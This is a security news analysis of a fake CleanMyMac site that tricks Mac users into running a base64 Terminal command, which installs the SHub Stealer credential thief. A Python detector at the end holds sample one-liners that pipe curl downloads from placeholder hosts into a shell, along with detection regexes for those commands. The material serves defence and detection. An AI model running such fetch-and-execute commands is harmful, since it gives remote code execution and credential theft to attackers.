
CleanMyMac Imposter Site Installs SHub Stealer on Macs
Why It Matters
The campaign demonstrates how social engineering can defeat macOS native defenses, exposing high‑value credentials and crypto assets. It underscores the urgent need for stricter execution controls and zero‑trust safeguards in enterprise Mac environments.
Key Takeaways
- Fake CleanMyMac site delivers SHub Stealer via Terminal command
- Malware bypasses Gatekeeper, notarization, and XProtect protections
- Loader geofences Russian keyboards to avoid CIS detection
- Harvested data includes passwords, keychain, crypto wallets, Telegram
- Mitigation: block command‑line scripts, enforce allow‑listing, use EDR/XDR
Pulse Analysis
The rise of macOS‑focused infostealers reflects attackers’ growing confidence in exploiting the platform’s perceived security. By mimicking a trusted utility, the fake CleanMyMac page leverages a technique known as ClickFix, where victims voluntarily execute a base64‑encoded command. This approach sidesteps traditional gatekeepers because the payload runs under the user’s privileges, rendering signature‑based defenses largely ineffective. Analysts note that such campaigns are increasingly sophisticated, embedding legitimate‑looking terminal output and immediate script piping to mask malicious activity.
Technical dissection of SHub Stealer reveals a multi‑stage infection chain. After the initial command, a loader performs system fingerprinting, aborting on Russian‑language keyboards—a clear geofencing tactic to evade law‑enforcement scrutiny in CIS regions. Successful infections proceed to harvest a breadth of credentials: macOS login passwords, Keychain secrets, browser cookies, and private keys from popular crypto wallets like MetaMask and Ledger. The malware then compresses the data and exfiltrates it via encrypted channels, giving threat actors a rich trove of financial and personal information.
For enterprises, the incident is a stark reminder that endpoint security must extend beyond app notarization. Deploying mobile device management (MDM) with strict allow‑listing, coupled with robust EDR/XDR solutions, can intercept unauthorized shell scripts before execution. Network‑level controls, such as DNS filtering and outbound traffic monitoring, further limit data exfiltration. As attackers continue to weaponize social engineering against macOS, adopting a zero‑trust posture—verifying every command and script—will be essential to protect both corporate and consumer ecosystems.
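As an added example (not code from the article or from any vendor tool), the following Python classifier scores shell command lines for the ClickFix pattern the analysis describes: a base64 literal decoded in Terminal and piped straight into a shell. The sample command lines, the payload text and the example.invalid hostnames are constructed for illustration and are not real indicators.

```python
import base64
import re

# Constructed samples (hypothetical, not real campaign indicators). The first
# mimics the ClickFix flow: the victim pastes a base64 blob that decodes to a
# download-and-pipe-to-shell one-liner, so the loader never touches Gatekeeper.
FAKE_PAYLOAD = "curl -fsSL https://update.example.invalid/s | bash"
SAMPLE_CMDLINES = [
    "echo " + base64.b64encode(FAKE_PAYLOAD.encode()).decode() + " | base64 -d | bash",
    "curl -fsSL https://example.invalid/install.sh | sh",
    "echo " + base64.b64encode(b"system check complete, no action needed").decode()
    + " | base64 -d",                      # base64 in Terminal, but harmless text
    "brew install --cask cleanmymac",      # ordinary package install
]

SHELL_PIPE = re.compile(r"\|\s*(?:/bin/)?(?:ba|z)?sh\b")   # "| sh", "| bash", "| /bin/zsh"
DOWNLOADER = re.compile(r"\b(?:curl|wget)\b")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")         # long base64-looking tokens


def decode_b64_tokens(cmd):
    """Return the UTF-8 text of every token in cmd that is valid base64."""
    out = []
    for tok in B64_TOKEN.findall(cmd):
        try:
            out.append(base64.b64decode(tok, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue                        # not base64, or binary: ignore the token
    return out


def classify_cmdline(cmd):
    """Score one command line for the base64 -> decode -> pipe-to-shell pattern.

    The decoded payload is inspected too, so a downloader hidden inside the
    base64 blob counts even though it never appears in the raw command line.
    """
    decoded = decode_b64_tokens(cmd)
    texts = [cmd] + decoded
    pipes_to_shell = any(SHELL_PIPE.search(t) for t in texts)
    downloads = any(DOWNLOADER.search(t) for t in texts)
    uses_b64 = "base64" in cmd and bool(decoded)
    score = int(pipes_to_shell) + int(downloads) + int(uses_b64)
    verdict = "block" if score >= 2 else "review" if score == 1 else "allow"
    return {"cmd": cmd, "decoded": decoded, "pipes_to_shell": pipes_to_shell,
            "downloads": downloads, "uses_b64": uses_b64, "verdict": verdict}


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        r = classify_cmdline(c)
        print(f"{r['verdict']:6} {c}")
```

The same function can be fed process command lines from an EDR export or a Terminal audit log; anything scored "block" is a candidate for the allow‑listing and script‑blocking controls the article recommends.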